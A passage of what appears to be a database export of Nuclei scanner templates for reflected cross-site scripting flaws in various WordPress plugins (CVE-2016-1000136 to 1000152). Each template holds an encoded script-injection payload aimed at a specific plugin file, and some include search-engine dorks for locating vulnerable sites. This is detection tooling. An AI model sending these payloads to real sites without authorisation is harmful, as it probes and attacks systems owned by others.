"time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f7d" }, "name": "CVE-2016-1000136.yaml", "content": "id: CVE-2016-1000136\n\ninfo:\n name: WordPress heat-trackr 1.0 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: WordPress heat-trackr 1.0 contains a cross-site scripting vulnerability via heat-trackr_abtest_add.php which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n remediation: |\n Upgrade to the latest version of WordPress heat-trackr or apply the provided patch to fix the XSS vulnerability.\n reference:\n - http://www.vapidlabs.com/wp/wp_advisory.php?v=798\n - https://wordpress.org/plugins/heat-trackr\n - https://nvd.nist.gov/vuln/detail/CVE-2016-1000136\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2016-1000136\n cwe-id: CWE-79\n epss-score: 0.00119\n epss-percentile: 0.45775\n cpe: cpe:2.3:a:heat-trackr_project:heat-trackr:1.0:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: heat-trackr_project\n product: heat-trackr\n framework: wordpress\n google-query: inurl:\"/wp-content/plugins/heat-trackr\"\n tags: cve2016,cve,wordpress,xss,wp-plugin,heat-trackr_project\n\nflow: http(1) && http(2)\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\"\n\n matchers:\n - type: word\n internal: true\n words:\n - '/wp-content/plugins/heat-trackr/'\n\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/heat-trackr/heat-trackr_abtest_add.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - ''\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 
4a0a004730450221008266c058f77b0bcce7d5c3840b1de017c2f9c9dcf29b4c25de3da0795616b617022051947c2820e443c04fae4fe4b80fc5d8b3c585f6fcd746499351570a80791f3c:922c64590222798bb761d5b6d8e72950", "hash": "c1fe868cdd90b4be37f09605bd9c217d", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f7e" }, "name": "CVE-2016-1000137.yaml", "content": "id: CVE-2016-1000137\n\ninfo:\n name: WordPress Hero Maps Pro 2.1.0 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: WordPress Hero Maps Pro 2.1.0 contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Update to the latest version of WordPress Hero Maps Pro plugin (2.1.1 or higher) which includes a fix for this vulnerability.\n reference:\n - http://www.vapidlabs.com/wp/wp_advisory.php?v=658\n - https://wordpress.org/plugins/hero-maps-pro\n - https://nvd.nist.gov/vuln/detail/CVE-2016-1000137\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2016-1000137\n cwe-id: CWE-79\n epss-score: 0.00101\n epss-percentile: 0.40457\n cpe: cpe:2.3:a:hero-maps-pro_project:hero-maps-pro:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: hero-maps-pro_project\n product: hero-maps-pro\n framework: wordpress\n tags: cve2016,cve,wordpress,xss,wp-plugin,maps,hero-maps-pro_project\n\nflow: http(1) && http(2)\n\nhttp:\n - raw:\n - |\n 
GET /wp-content/plugins/hero-maps-pro/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: word\n internal: true\n words:\n - 'Hero Maps Pro ='\n\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/hero-maps-pro/views/dashboard/index.php?v=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100ca078885ee89701b0101c68c31266741248f0cd91d17638c44938f0ecc86fc99022100eeb3152a54e3fc1c80a725aa1880ad8ac60b32cc41a7f52f9b9f05f9b96e21c1:922c64590222798bb761d5b6d8e72950", "hash": "eb856726a13c3a03e4a0e5a65bdc1652", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f7f" }, "name": "CVE-2016-1000138.yaml", "content": "id: CVE-2016-1000138\n\ninfo:\n name: WordPress Admin Font Editor <=1.8 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: WordPress Admin Font Editor plugin indexisto 1.8 and before contains a cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. 
This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n impact: |\n This vulnerability allows an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Update to the latest version of the WordPress Admin Font Editor plugin (1.8 or higher) to fix this vulnerability.\n reference:\n - http://www.vapidlabs.com/wp/wp_advisory.php?v=38\n - https://wordpress.org/plugins/indexisto\n - http://web.archive.org/web/20210622181116/\n - https://nvd.nist.gov/vuln/detail/CVE-2016-1000138\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2016-1000138\n cwe-id: CWE-79\n epss-score: 0.00119\n epss-percentile: 0.45775\n cpe: cpe:2.3:a:indexisto_project:indexisto:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: indexisto_project\n product: indexisto\n framework: wordpress\n google-query: inurl:\"/wp-content/plugins/indexisto\"\n tags: cve,cve2016,wordpress,xss,wp-plugin,indexisto_project\n\nflow: http(1) && http(2)\n\nhttp:\n - raw:\n - |\n GET /wp-content/plugins/indexisto/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: word\n internal: true\n words:\n - '= Indexisto'\n\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/indexisto/assets/js/indexisto-inject.php?indexisto_index=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402201f497916921501b875878ceba1666d2f55f9f59aa773a30aeb759dbd9ff49d05022015296c72674c1a9c191771b6e5c5d9e61676c016ac61ea6c0aec7b45e2249bcd:922c64590222798bb761d5b6d8e72950", "hash": "17e5e26514938ac2a813054c63a0e5b4", "level": 4, "time": "2024-05-17 
23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f80" }, "name": "CVE-2016-1000139.yaml", "content": "id: CVE-2016-1000139\n\ninfo:\n name: WordPress Infusionsoft Gravity Forms <=1.5.11 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: WordPress plugin Infusionsoft 1.5.11 and before contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.\n remediation: |\n Update to the latest version of the Infusionsoft Gravity Forms plugin (>=1.5.12) which includes a fix for this vulnerability.\n reference:\n - https://wpscan.com/vulnerability/0a60039b-a08a-4f51-a540-59f397dceb6a\n - https://wordpress.org/plugins/infusionsoft\n - http://www.vapidlabs.com/wp/wp_advisory.php?v=864\n - https://nvd.nist.gov/vuln/detail/CVE-2016-1000139\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2016-1000139\n cwe-id: CWE-79\n epss-score: 0.00116\n epss-percentile: 0.44389\n cpe: cpe:2.3:a:infusionsoft_project:infusionsoft:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: infusionsoft_project\n product: infusionsoft\n framework: wordpress\n google-query: inurl:\"/wp-content/plugins/infusionsoft\"\n tags: cve2016,cve,wordpress,wp-plugin,xss,wpscan,infusionsoft_project\n\nflow: http(1) && http(2)\n\nhttp:\n - raw:\n - |\n GET /wp-content/plugins/infusionsoft/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: word\n internal: true\n words:\n - 'Infusionsoft'\n - 'Tags:'\n 
condition: and\n case-insensitive: true\n\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/infusionsoft/Infusionsoft/examples/leadscoring.php?ContactId=%22%3E%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E%3C%22\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '\"><\"'\n - 'input type=\"text\" name=\"ContactId\"'\n condition: and\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100e07437f284d69ad7b1e86b00b90017f487a6ca63ba0bb1f5107015a7f85ecc600220153bd6ae71159dd9826db4aa229bbc07e303d5655b6d567aae3fb89c45e8bc26:922c64590222798bb761d5b6d8e72950", "hash": "947ad4d85f70b4af2f12661931cb230b", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f81" }, "name": "CVE-2016-1000140.yaml", "content": "id: CVE-2016-1000140\n\ninfo:\n name: WordPress New Year Firework <=1.1.9 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: WordPress New Year Firework 1.1.9 and before contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. 
This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n impact: |\n Successful exploitation of this vulnerability could lead to cross-site scripting (XSS) attacks, allowing an attacker to execute malicious scripts on the victim's browser.\n remediation: |\n Update to the latest version of the WordPress New Year Firework plugin (1.1.9) to mitigate this vulnerability.\n reference:\n - http://www.vapidlabs.com/wp/wp_advisory.php?v=453\n - https://wordpress.org/plugins/new-year-firework\n - https://nvd.nist.gov/vuln/detail/CVE-2016-1000140\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2016-1000140\n cwe-id: CWE-79\n epss-score: 0.00119\n epss-percentile: 0.45851\n cpe: cpe:2.3:a:new-year-firework_project:new-year-firework:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: new-year-firework_project\n product: new-year-firework\n framework: wordpress\n tags: cve2016,cve,wordpress,xss,wp-plugin,new-year-firework_project\n\nflow: http(1) && http(2)\n\nhttp:\n - raw:\n - |\n GET /wp-content/plugins/new-year-firework/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: word\n internal: true\n words:\n - 'New Year Firework ='\n\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/new-year-firework/firework/index.php?text=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 490a004630440220522b8d1268fc27200f3edb6ad9277377dbf2941cf980dce8e440fb4520257a7c0220650d2c599689ac4226a6d3839440c8d4991a99d77b01e3b77f968df17206624d:922c64590222798bb761d5b6d8e72950", "hash": "172c62f7aa961d63f96a939116326700", "level": 4, "time": "2024-05-17 
23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f82" }, "name": "CVE-2016-1000141.yaml", "content": "id: CVE-2016-1000141\n\ninfo:\n name: WordPress Page Layout builder v1.9.3 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: WordPress plugin Page-layout-builder v1.9.3 contains a cross-site scripting vulnerability.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.\n remediation: Upgrade to version 2.0 or higher.\n reference:\n - http://www.vapidlabs.com/wp/wp_advisory.php?v=358\n - https://nvd.nist.gov/vuln/detail/CVE-2016-1000141\n - https://wordpress.org/plugins/page-layout-builder\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2016-1000141\n cwe-id: CWE-79\n epss-score: 0.00142\n epss-percentile: 0.48963\n cpe: cpe:2.3:a:page-layout-builder_project:page-layout-builder:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: page-layout-builder_project\n product: page-layout-builder\n framework: wordpress\n google-query: inurl:\"/wp-content/plugins/page-layout-builder\"\n tags: cve,cve2016,wordpress,xss,wp-plugin,page-layout-builder_project\n\nflow: http(1) && http(2)\n\nhttp:\n - raw:\n - |\n GET /wp-content/plugins/page-layout-builder/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: word\n internal: true\n words:\n - 'Page Layout Builder ='\n\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/page-layout-builder/includes/layout-settings.php?layout_settings_id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 
200\n# digest: 490a0046304402207b38e136a9969ec1f99831e2c7263ca370a24726ca3e1456694b26bb08f2409a022071798757cb48c00cf6d507e23b12a5e1043e8a2142eac179e3c60b0ae9e862a9:922c64590222798bb761d5b6d8e72950", "hash": "40d7f2be3814fadd0dfede62733a375f", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f83" }, "name": "CVE-2016-1000142.yaml", "content": "id: CVE-2016-1000142\n\ninfo:\n name: WordPress MW Font Changer <=4.2.5 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: WordPress MW Font Changer plugin 4.2.5 and before contains a cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n impact: |\n Allows remote attackers to execute arbitrary script or HTML code in the context of the affected site, potentially leading to session hijacking, defacement, or data theft.\n remediation: |\n Update to the latest version of the WordPress MW Font Changer plugin (4.2.5) or remove the plugin if it is not necessary.\n reference:\n - https://wpscan.com/vulnerability/4ff5d65a-ba61-439d-ab7f-745a0648fccc\n - http://www.vapidlabs.com/wp/wp_advisory.php?v=435\n - https://wordpress.org/plugins/parsi-font\n - https://nvd.nist.gov/vuln/detail/CVE-2016-1000142\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2016-1000142\n cwe-id: CWE-79\n epss-score: 0.00103\n epss-percentile: 0.40793\n cpe: cpe:2.3:a:parsi-font_project:parsi-font:4.2.5:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: parsi-font_project\n product: parsi-font\n framework: wordpress\n tags: cve2016,cve,wordpress,wp-plugin,xss,wpscan,parsi-font_project\n\nflow: http(1) && http(2)\n\nhttp:\n - raw:\n - |\n GET 
/wp-content/plugins/parsi-font/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: word\n internal: true\n words:\n - 'WP-Parsi Admin Font Editor'\n - 'MW Font Changer'\n condition: or\n\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/parsi-font/css.php?size=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - ''\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 490a004630440220034124fd53f359794e6e238c8b5b1ab2197fdc51283ea8dd11cf6ddd8fa4df6e02203120eabbf0438bac3e922f39a39edc6ae6c7f924e34a83e237574aa8a1b653c4:922c64590222798bb761d5b6d8e72950", "hash": "ed26b54a4f1bf932bb0b01d206d54d76", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f84" }, "name": "CVE-2016-1000143.yaml", "content": "id: CVE-2016-1000143\n\ninfo:\n name: WordPress Photoxhibit 2.1.8 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: WordPress Photoxhibit 2.1.8 contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. 
This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in a victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Update to the latest version of WordPress Photoxhibit or apply the official patch provided by the vendor.\n reference:\n - http://www.vapidlabs.com/wp/wp_advisory.php?v=780\n - https://wordpress.org/plugins/photoxhibit\n - https://nvd.nist.gov/vuln/detail/CVE-2016-1000143\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2016-1000143\n cwe-id: CWE-79\n epss-score: 0.00142\n epss-percentile: 0.48963\n cpe: cpe:2.3:a:photoxhibit_project:photoxhibit:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: photoxhibit_project\n product: photoxhibit\n framework: wordpress\n tags: cve2016,cve,wordpress,wp-plugin,xss,photoxhibit_project\n\nflow: http(1) && http(2)\n\nhttp:\n - raw:\n - |\n GET /wp-content/plugins/photoxhibit/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: word\n internal: true\n words:\n - 'PhotoXhibit'\n - 'Tags:'\n condition: and\n\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/photoxhibit/common/inc/pages/build.php?gid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - ''\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4a0a004730450220027603f0d1de2acc97e034855a99ec951e107675f80ebd29fc7bf81a24688123022100aa8edd1f5bb3e9b8565748afd25a344bd0ac85b9f44b7e54af747bedd030e50f:922c64590222798bb761d5b6d8e72950", "hash": "ff12ab7f077a37a89803cb0d155fa8d7", "level": 4, "time": 
"2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f85" }, "name": "CVE-2016-1000146.yaml", "content": "id: CVE-2016-1000146\n\ninfo:\n name: WordPress Pondol Form to Mail <=1.1 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: WordPress Pondol Form to Mail 1.1 and before contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.\n remediation: |\n Update to the latest version of the Pondol Form to Mail plugin (>=1.2) or apply a patch provided by the vendor to fix the XSS vulnerability.\n reference:\n - http://www.vapidlabs.com/wp/wp_advisory.php?v=787\n - https://wordpress.org/plugins/pondol-formmail\n - https://nvd.nist.gov/vuln/detail/CVE-2016-1000146\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2016-1000146\n cwe-id: CWE-79\n epss-score: 0.00119\n epss-percentile: 0.45775\n cpe: cpe:2.3:a:pondol-formmail_project:pondol-formmail:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: pondol-formmail_project\n product: pondol-formmail\n framework: wordpress\n tags: cve2016,cve,wordpress,xss,wp-plugin,mail,pondol-formmail_project\n\nflow: http(1) && http(2)\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\"\n\n matchers:\n - type: word\n internal: true\n words:\n - '/wp-content/plugins/pondol-formmail/'\n\n - method: GET\n path:\n - 
\"{{BaseURL}}/wp-content/plugins/pondol-formmail/pages/admin-mail-info.php?itemid=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4a0a004730450220756ecce1cb5af708018bfca00a194af5448f9907a107220029c9eb45c5e73eb2022100ac155b8a798d889d77e3646cca606a536d6d35cca973209e5de2af224f31b6c6:922c64590222798bb761d5b6d8e72950", "hash": "3efa6b346960b3ae97e5736b0cb6f30f", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f86" }, "name": "CVE-2016-1000148.yaml", "content": "id: CVE-2016-1000148\n\ninfo:\n name: WordPress S3 Video <=0.983 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: WordPress S3 Video and before contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. 
This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft or unauthorized actions.\n remediation: |\n Update to the latest version of WordPress S3 Video plugin (>=0.984) to mitigate this vulnerability.\n reference:\n - https://wpscan.com/vulnerability/ead796ed-202a-451f-b041-d39c9cf1fb54\n - https://wordpress.org/plugins/s3-video\n - http://www.vapidlabs.com/wp/wp_advisory.php?v=240\n - https://nvd.nist.gov/vuln/detail/CVE-2016-1000148\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2016-1000148\n cwe-id: CWE-79\n epss-score: 0.00119\n epss-percentile: 0.4505\n cpe: cpe:2.3:a:s3-video_project:s3-video:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: s3-video_project\n product: s3-video\n framework: wordpress\n tags: cve2016,cve,wordpress,wp-plugin,xss,wpscan,s3-video_project\n\nflow: http(1) && http(2)\n\nhttp:\n - raw:\n - |\n GET /wp-content/plugins/s3-video/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: word\n internal: true\n words:\n - 'S3 Video Plugin ='\n\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/s3-video/views/video-management/preview_video.php?media=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3C%22\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '<\"'\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100af55ea8a75b6507ffcd4de783bab308e5528311e23b88402b155f7aae52edf1402204a26ad1fb718e585ab042d394312047068437b70d56e60201ba94d88d9008ec5:922c64590222798bb761d5b6d8e72950", "hash": "2e8df1037e370e9bea3af9fbcf7b9e0d", "level": 4, "time": 
"2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f87" }, "name": "CVE-2016-1000149.yaml", "content": "id: CVE-2016-1000149\n\ninfo:\n name: WordPress Simpel Reserveren <=3.5.2 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: WordPress plugin Simpel Reserveren 3.5.2 and before contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft or unauthorized actions.\n remediation: |\n Upgrade to the latest version of the WordPress Simpel Reserveren plugin (>=3.5.3) or apply a patch provided by the vendor to fix the XSS vulnerability.\n reference:\n - https://wordpress.org/plugins/simpel-reserveren\n - http://www.vapidlabs.com/wp/wp_advisory.php?v=474\n - https://nvd.nist.gov/vuln/detail/CVE-2016-1000149\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2016-1000149\n cwe-id: CWE-79\n epss-score: 0.00119\n epss-percentile: 0.4505\n cpe: cpe:2.3:a:simpel-reserveren_project:simpel-reserveren:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: simpel-reserveren_project\n product: simpel-reserveren\n framework: wordpress\n tags: cve2016,cve,wordpress,xss,wp-plugin,simpel-reserveren_project\n\nflow: http(1) && http(2)\n\nhttp:\n - raw:\n - |\n GET /wp-content/plugins/simpel-reserveren/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: word\n internal: true\n words:\n - 'Simpel Reserveren'\n - 'Tags:'\n condition: and\n\n - method: GET\n path:\n - 
\"{{BaseURL}}/wp-content/plugins/simpel-reserveren/edit.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100d334015dd9ba6694bdd6bdab650cd81364fbff781687d1005f962218ed50097702201592398ce3d811966592a2774ad808225c335516750c7244e8b1b1297a53c079:922c64590222798bb761d5b6d8e72950", "hash": "95e30d40bc2364afdb9feaaf64baf61b", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f88" }, "name": "CVE-2016-1000152.yaml", "content": "id: CVE-2016-1000152\n\ninfo:\n name: WordPress Tidio-form <=1.0 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: WordPress tidio-form1.0 contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. 
This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the website, leading to potential data theft, session hijacking, or defacement.\n remediation: |\n Update to the latest version of the Tidio-form plugin (version >1.0) to mitigate the XSS vulnerability.\n reference:\n - http://www.vapidlabs.com/wp/wp_advisory.php?v=799\n - https://wordpress.org/plugins/tidio-form\n - https://nvd.nist.gov/vuln/detail/CVE-2016-1000152\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2016-1000152\n cwe-id: CWE-79\n epss-score: 0.00251\n epss-percentile: 0.63018\n cpe: cpe:2.3:a:tidio-form_project:tidio-form:1.0:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: tidio-form_project\n product: tidio-form\n framework: wordpress\n tags: cve2016,cve,wordpress,xss,wp-plugin,tidio-form_project\n\nflow: http(1) && http(2)\n\nhttp:\n - raw:\n - |\n GET /wp-content/plugins/tidio-form/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: word\n internal: true\n words:\n - 'Easy Contact Form Builder ='\n\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/tidio-form/popup-insert-help.php?formId=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 490a004630440220371986730365fa3c1674aa1f56a72baf45ff191c9f1629c48186c33a96c6173802200648d66b4e5d140cd9da1c36b9f739331a5200dc9e9d2e4bf3cc9323dff15fc8:922c64590222798bb761d5b6d8e72950", "hash": "2d52fc4ab6f23e10136a83aff66a1655", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307f89" }, "name": "CVE-2016-1000153.yaml", "content": "id: 
